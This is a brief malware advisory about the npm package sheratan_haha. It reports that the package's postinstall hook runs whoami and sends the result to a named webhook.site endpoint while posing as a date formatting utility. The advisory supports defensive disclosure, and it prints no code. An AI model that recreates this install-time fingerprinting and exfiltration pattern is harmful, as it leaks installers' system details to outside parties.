Malicious code in sheratan_haha (npm)

__

Source: amazon-inspector (6b473b40e0c041d34e85161ed8c91e0e00d006a0822698a0d3994876cb685ddd)

On npm install, the package's declared postinstall hook (node postinstall.js) runs whoami on the installer's machine and POSTs the output to a hardcoded webhook.site endpoint (https://webhook.site/0ea9eb45-3ede-4cf0-9ea9-2b8d700272e7) via https.request. The package advertises itself as 'A simple date formatting utility' but ships no library code consistent with that purpose — the only behavior on install is host fingerprinting and exfiltration to an attacker-controlled URL. Metadata is placeholder-shaped (empty author, generic description, name sheratan_haha), consistent with a dependency-confusion / recon PoC. Installing this package leaks the installer's OS username to an external endpoint controlled by the publisher.